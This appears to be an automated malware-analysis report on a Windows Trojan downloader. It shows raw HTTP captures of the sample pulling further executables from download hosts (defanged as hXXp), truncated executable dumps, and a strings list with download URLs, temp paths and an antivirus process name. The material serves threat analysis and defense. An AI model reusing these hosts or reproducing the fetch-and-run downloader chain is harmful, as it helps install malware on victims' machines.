.X..<....X..(....h.T....<N..&..=.cc.)...........WL.....fW..8e.a.
h.~.O,....O8..&.A.S.........._....n.\Tz.=.m:4.v...w}VQ.....SZ......I`.
...~.....Sh)%..b.H.i..Q....9t.......-v.......J-#4..[6..!.=;e.fy7p.P.7.
.z....!{..;.........<.m.....C6....d.y.6.Mi...z._...'....:}c..O.K$.v
j.\...f.......I....i g~.d.G4..(..L..3...i..D.j...(......3..m..2=..
<<< skipped >>>


GET /fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027 HTTP/1.1
Referer: hXXp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jafaye.ynhaoya.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: marco/0.5
Date: Sat, 20 Dec 2014 05:13:48 GMT
Content-Type: application/octet-stream
Content-Length: 108632
Connection: keep-alive
X-Request-Id: 8879884559421a09a3cbc32ffd33f322; 320f88ff09ff646b1525c149da6c721c; 95be69e69653739102feb611ad7193c3; 3a87dfe84c736c89a24068822ded4f09
X-Source: U/200
Last-Modified: Sat, 20 Dec 2014 04:47:14 GMT
Expires: Sat, 27 Dec 2014 06:31:18 GMT
Cache-Control: max-age=611038
Accept-Ranges: bytes
Age: 1589
X-Cache: MISS|HIT from ctn-zj-hgh-098; MISS|HIT from ctn-gd-zhs-006; HIT from usn-us-vcv-130
Content-Disposition: attachment; filename=1419052427l238l63518.exe
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................Z...........0.......p....@.........
........................5\.......................................s....
...`.. I..............H...............................................
.............p...............................text....X.......Z........
.......... ..`.rdata.......p.......^..............@..@.data...x.......
.....p..............@....ndata... ...@...........................rsrc.
.. I...`...J...t..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
..>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u
...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..
M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...
Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@.
.vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r
@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.
......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>


GET /dts/css/client/game1.css?t=1419052484 HTTP/1.1
Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3®times=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:46 GMT
Server: nginx/1.4.2
Content-Type: text/css
Content-Length: 8315
Last-Modified: Sat, 13 Dec 2014 06:42:52 GMT
ETag: "548bdfec-207b"
Expires: Mon, 19 Jan 2015 05:14:47 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
X-Via: 1.1 zjjhdx32:8106 (Cdn Cache Server V2.0), 1.1 kf49:4 (Cdn Cache Server V2.0)
Connection: keep-alive
idth:606px;height:395px;overflow:hidden;color:#66554b;background:#000;
}...log {background:url(game1/main.jpg) no-repeat;}...reg {background:
url(game1/main.jpg) no-repeat;}...server {background:url(game1/server.
jpg) no-repeat;}...history {background:url(game1/history.jpg) no-repea
t;}../* log */../* kv */...kv-focus {width:221px;height:131px;overflow
:hidden;position:absolute;top:4px;right:7px;}...log-kv {position:relat
ive;width:221px;height:131px;overflow:hidden;}...log-kv img {vertical-
align:bottom;width:221px;height:131px;}...log-kv-nav {position:absolut
e;bottom:2px;right:5px;}...log-kv-nav a {float:left;display:block;back
ground-color:#fff;color:#000;padding:2px 8px;margin-right:5px;_display
:inline;text-indent:-9999px;font-size: 0;}...log-kv-nav .focus, .log-k
v-nav a:hover {background-color:#fd8800;color:#fff;text-decoration:non
e;}../* news */...news-tab {display:none;}...news {width:350px;height:
135px;overflow:hidden;position:absolute;top:34px;left:10px;}...news li
 {padding:0 10px 0 16px;height:23px;border-bottom:0;line-height:24px;b
ackground:url(game1/dot.jpg) no-repeat left center;}...news li a {disp
l@charset "utf-8";..html, body, div, span, iframe,h1, h2, p, blockquot
e, pre,abbr, em, img, samp,small, strong, sub,b, i,dl, dt, dd, ul, li,
..fieldset, form, label, legend,table, caption, tbody, tfoot, thead, t
r, th, td,article, aside, canvas, details, figcaption, ..figure, foote
r, header,hgroup, menu, nav, section, summary {margin:0;padding:0;bord
er:0;outline:0;}..a, input, button {padding:0;margin:0;outline:0;b
<<< skipped >>>

GET /dts/css/client/game1/main.jpg HTTP/1.1


Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3®times=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Fri, 09 Jan 2015 03:30:47 GMT
Date: Wed, 10 Dec 2014 03:30:47 GMT
Server: nginx/1.0.11
Content-Type: image/jpeg
Content-Length: 52706
Last-Modified: Thu, 05 Jun 2014 07:17:53 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx41:8107 (Cdn Cache Server V2.0), 1.1 kf50:8 (Cdn Cache Server V2.0)
Connection: keep-alive
......JFIF.....H.H.....C..............................................
......................C...............................................
..........................^...........................................
.f.........................!1.."AQ.2aq..#B.3R......$b....LTr...DS...
...&56cds......7.....'EFtUVf.....................................F....
....................!.1A.."Qa.2q.......BR...#3b.....%DSTcdr...........
......?..Tl}..&..f....eV[.6xTe..m.@}Z......),..gJ.P.[;P.{..4.....v.OIr
....S...%.SRi...V......j...&.!D..`n.T_....#.8.7n[.k..-3..Z.?.Wn..Rl.E2
..Z.g....u.M^.n............Pb.H..>...].O..&....JVyr..)...w......dv.
.r.`.u.......k^vzt.......;....2.......= 4'l;J.J*]j......9..[8....mkP..
.......Al...@R... oO......wg^..@l..^...?.......S..5i....ma. *....*...?
.g.R.s..i..F..U.........0v...p...L..*...]. .3.-..8nP.._.Wo=.....T....w
M...{..WvY...h...n...D.}...&H%.........fM4..7..v.umE......7k..$..f....
.oY....gkL.]..\.T.d...w.wt.\1.X.zsxsL.{S.{[.~_5.M.F...i..z]w..l.......
.8.V....Y..Y..X..c....m...E.M0=.y. ..yG...x.WL.0.V.?...-.....F.....6D.
#c..^.S.m..Y...y.H..*c ....c.w....#..%..u^.%....m...\.U.D..>..>.
-X.....MB.....o. ..._..........&......v..}.yX.&........l}.I.%O.x....*m
..f...y8..&.0X...c....&R....v...)......y:T......?.vs.].\=.~....rZo....
....]..6.^.m......>.].eI...q...bl.*......./.7.j.Z..=z.....4S..X....
%.?.h./...w.fW..^.l.... .].o..*.d.>g.4...kYA.P-.<P....Z...zi..;U
k.<........L.z..Woe...3.M~....b...[..{.T...f.Vd.E..L.>d..PM....M
K..bQ1......t.?......?n..../..y~Y.\......o}..X=...............q...
<<< skipped >>>


GET /yx_dts.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: idc.xn--r93a55o.cc
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 915216
Content-Type: application/octet-stream
Last-Modified: Thu, 18 Dec 2014 08:27:47 GMT
Accept-Ranges: bytes
ETag: "2c1fe2809c1ad01:5c1"
Server: Microsoft-IIS/6.0
Date: Sat, 20 Dec 2014 05:14:36 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
...........................q@.......................................s.
......@..HW..............H............................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@..@.data........
........r..............@....ndata.......@...........................rs
rc...HW...@...X...v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.
P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......P
p@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>

GET /OfficeAssist.0419.80.1123.exe HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: idc.xn--r93a55o.cc
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 3696856
Content-Type: application/octet-stream
Last-Modified: Fri, 19 Dec 2014 12:34:18 GMT
Accept-Ranges: bytes
ETag: "22d7c1b881bd01:5c1"
Server: Microsoft-IIS/6.0
Date: Sat, 20 Dec 2014 05:14:41 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
..........................9......................................t....
...... 0..........pO8.h...............................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@..@.data...X\......
.....v..............@....ndata...................................rsrc.
.. 0.......2...z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@
..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u
....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..
Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET /RzuoiTP HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: t.cn
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Location: hXXps://pchome.b0.upaiyun.com/2.ico
Content-Type: text/html;charset=UTF-8
Server: weibo
Content-Length: 217
Date: Sat, 20 Dec 2014 05:13:50 GMT
X-Varnish: 2548699336
Age: 0
Via: 1.1 varnish
Connection: keep-alive
<HTML>.<HEAD>.<TITLE>Moved Temporarily</TITLE>
.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>
;Moved Temporarily</H1>.The document has moved <A HREF="https
://pchome.b0.upaiyun.com/2.ico">here</A>..</BODY>.</
HTML>...



GET /controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3®times=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gameapp.37.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Dec 2014 05:14:44 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ea0f103f76d0c56ec96c6b4448e34036; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sq_client_data=a%3A6%3A%7Bs%3A7%3A%22game_id%22%3Bs%3A3%3A%22237%22%3Bs%3A5%3A%22refer%22%3Bs%3A10%3A%22feitian_wd%22%3Bs%3A3%3A%22uid%22%3Bs%3A6%3A%22905848%22%3Bs%3A13%3A%22showlogintype%22%3Bs%3A1%3A%223%22%3Bs%3A8%3A%22tpl_type%22%3Bs%3A5%3A%22game1%22%3Bs%3A11%3A%22installtime%22%3Bs%3A8%3A%2220141220%22%3B%7D; path=/; domain=37.com
Set-Cookie: client_type=3; path=/; domain=37.com
37web: zs_12_18_web
2548..<!doctype html>.<html lang="en">.<head>.    &l
t;meta charset="UTF-8" />.    <title>......</title>.   
 <link rel="stylesheet" href="hXXp://img1.37wanimg.com/dts/css/clie
nt/game1.css?t=1419052484" />.</head>.<body data-gameid="2
37">.    <div class="container log relative">.        <div
 class="log-form relative">.            <p>.                &
lt;label for="log-username">.........</label>.               
 <input type="text" name="log-username" id="log-username" class="lo
g-username"/><span class="status"></span>.            &
lt;/p>.            <7.com/zt/dts/20141209/" target="_blank">&
lt;img src="hXXp://img2.37wanimg.com/2014/12/101215116dbQk.jpg" alt=""
/></a>..                </div>..                       
         <div class="log-kv-panel">..                    <a h
ref="hXXp://dts.37.com/xinwen_20141204_4739/" target="_blank"><i
mg src="hXXp://img2.37wanimg.com/2014/12/04190114Mvpaw.jpg" alt=""/>
;</a>..                </div>..                           
     <div class="log-kv-panel">..                    <a href=
"hXXp://huodong.37.com/zt/dts/20141203/" target="_blank"><img sr
c="hXXp://img2.37wanimg.com/2014/11/19204027FVrEy.jpg" alt=""/><
/a>..                </div>..                                
<div class="log-kv-panel">..                    <a href="http
://dts.37.com/dq/" target="_blank"><img src="hXXp://img2.37w
<<< skipped >>>


GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 20 Dec 2014 05:14:50 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=1654165040; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Mon, 15 Dec 2014 01:30:00 GMT
Content-type: text/html
Content-Length: 5305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmln
s="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="C
ontent-Type" content="text/html; charset=utf-8"><style type="tex
t/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial
,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-hei
ght:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0
 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.bt
n_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px
;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background
:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-re
peat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptl
ogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list
_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/
style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:n
one;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-
word;min-height:20px;clear:both}#list_uin li input{float:left;margin-b
ottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;wid
th:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;c
olor:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style
><script>var g_begTime=new Date();..(function(){...window.one
rror = function(msg,url,line){....var t = document.createElement('
<<< skipped >>>


GET /yx/dts/sqft/905848/app.ini HTTP/1.1
User-Agent: HTTPDownloader
Host: d.wanyouxi7.com


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:47 GMT
Content-Length: 61
Accept-Ranges: bytes
Content-Type: application/octet-stream
Last-Modified: Thu, 13 Nov 2014 07:23:49 GMT
ETag: "54645c85-3d"
X-Cache: HIT from p05.i01
X-Cache: HIT from c02.i05.
[version].currentversion=3.0.0.0.[recommend].link=.linkname=...



GET /iplookup/iplookup.php HTTP/1.0
Host: int.dpool.sina.com.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:13:54 GMT
Server: Apache
Set-Cookie: U_TRS1=00000026.d6097b1e.54950592.07e9c9db; path=/; expires=Tue, 17-Dec-24 05:13:54 GMT; domain=.sina.com.cn
Set-Cookie: U_TRS2=00000026.d6117b1e.54950592.a16e5f72; path=/; domain=.sina.com.cn
Cache-Control: max-age=120
Expires: Sat, 20 Dec 2014 05:15:54 GMT
DPOOL_HEADER: 10.79.112.38
Content-Length: 26
Connection: close
Content-Type: text/html; charset=GBK
SINA-LB:aGEuMTA4LmczLnlmLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:ZDc5MjljY2UgMCAwIDAgNCAwCg==
1.-1.-1.....................



GET /ktv/9158chat2_ktv083_98200205.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive


HTTP/1.0 200 OK
Date: Sat, 20 Dec 2014 05:12:45 GMT
Content-Type: application/octet-stream
ETag: "386472367"
Accept-Ranges: bytes
Last-Modified: Thu, 18 Dec 2014 07:15:44 GMT
Content-Length: 15062552
Server: WS CDN Server
Age: 126
Via: 1.0 hbjm166:80 (Cdn Cache Server V2.0), 1.0 nanning16:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..
u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....
:J.................\...........2.......p....@.........................
. ...............................................s...........d........
......@............................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@..@.data...x............r..........
....@....ndata...p...@...........................rsrc....d.......f...v
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
..>B..H.P.u..u..u...Hr@..X...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u
...Pr@..}..e..9}...Dp@........FP.VT........ M............U....M....3..
.3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M..
.Hp@..E...E.P.E.P.u...Tr@..u....E..9}...e....~X.te.v4..Lp@....E.tU.}.j
.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@.
.u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.
;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<< skipped >>>


GET /Downloaderconfig.aspx?imgtype=9158 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tj.9158.com
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:50 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 948
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>..
...............</title></head>..<body style=" margin:0p
x">..    <form name="form1" method="post" action="Downloaderconf
ig.aspx?imgtype=9158" id="form1">..<div>..<input type="hid
den" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTU4MjMyMzI1ZG
TU5ZBXmwe1gDNP/W SPke44 A65Q==" />..</div>..<div>...<
;input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERA
TOR" value="91FFCAD5" />..</div>..    <div>..      ..  
       <object >..        ..              <embed  src="http:/
/tj.9158.com/temp/flash/1.swf"  width="490px" height="180px" quality="
high" pluginspage="hXXp://VVV.macromedia.com/go/getflashplayer" type="
application/x-shockwave-flash" wmode="transparent" ></embed>.
.          </object>.. ..    </div>..    </form>..&l
t;/body>..</html>....



GET /controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=237&ext_1=2&ext_2=feitian_wd&ext_3=905848&ext_4=855392B634F846E395634D027DCD1AB4&ext_5=1c4e8afc5f13c9a8784201dba5a3f2e0&ext_6=2&browser_type=3001 HTTP/1.1
User-Agent: HTTPDownloader
Host: a.clickdata.37wan.com


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 20 Dec 2014 05:14:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2757cfd3a4293290c5b7afd7714204f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
1..1..0..



GET /mmliao/MM-liao8398.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: show.man1234.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Date: Sat, 20 Dec 2014 05:13:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: hXXp://down.cncpa.net:9000/mmliao/MM-liao9906.exe
Set-Cookie: ASP.NET_SessionId=w2k1ic55pk0pnr45szporcfn; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 804
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://down.
cncpa.net:9000/mmliao/MM-liao9906.exe">here</a>.</h2>..
</body></html>....<!DOCTYPE html PUBLIC "-//W3C//DTD XH
TML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-tran
sitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >.
.<head><title>.................</title></head>
..<body>..    <form name="form1" method="post" action="../dow
nload/SubConfig.aspx?id1=8398" id="form1">..<div>..<input 
type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzN
DMwNTMzZGQiFbVbBJv7A/lcSr1Og9mkU0lctw==" />..</div>..<div&
gt;...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWST
ATEGENERATOR" value="9F81D7CC" />..</div>..    <div>.. 
   ..    </div>..    </form>..</body>..</html>
....



GET /ffdy_238_63518.exe HTTP/1.1
Referer: hXXp://VVV.hanyueyr.com/ffdy_238_63518.exe
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: VVV.hanyueyr.com
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Date: Sat, 20 Dec 2014 05:13:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
location: hXXp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027
0..

The Trojan connects to the servers at the folowing location(s):

1419052427l238l63518.exe&_upt=6ec6a9a21419053027_1812:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp\Inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp\Inetc.dll
NjM1MTguZXhlJl91cHQ9NmVjNmE5YTIxNDE5MDUzMDI3/40.html
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl40.tmp
TguZXhlJl91cHQ9NmVjNmE5YTIxNDE5MDUzMDI3/40.html
s.ZM!f
@.reloc
MSVCR80.dll
_crt_debugger_hook
Base64.dll
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50608.0" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
/password
Uploading %s
&.Gi0
%Program Files%\1.rar
emp\nsl40.tmp
1.rar
Grub4DOS Toolbox for Windows 0.1
am Files\nsu41.tmp
mp\nsl40.tmp
rogram Files\1.rar
ray.exe
360sd.exe
hXXp://VVV.bangshijz.com
hXXp://pchome.b0.upaiyun.com/1.ico
n/iplookup/iplookup.php
p://int.dpool.sina.com.cn/iplookup/iplookup.php
hXXp://idc.xn--r93a55o.cc/onlines_30863.exe
80.1123.exe
onlines_30863.exe
c:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027
%Program Files%
1419052427l238l63518.exe&_upt=6ec6a9a21419053027
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3F.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
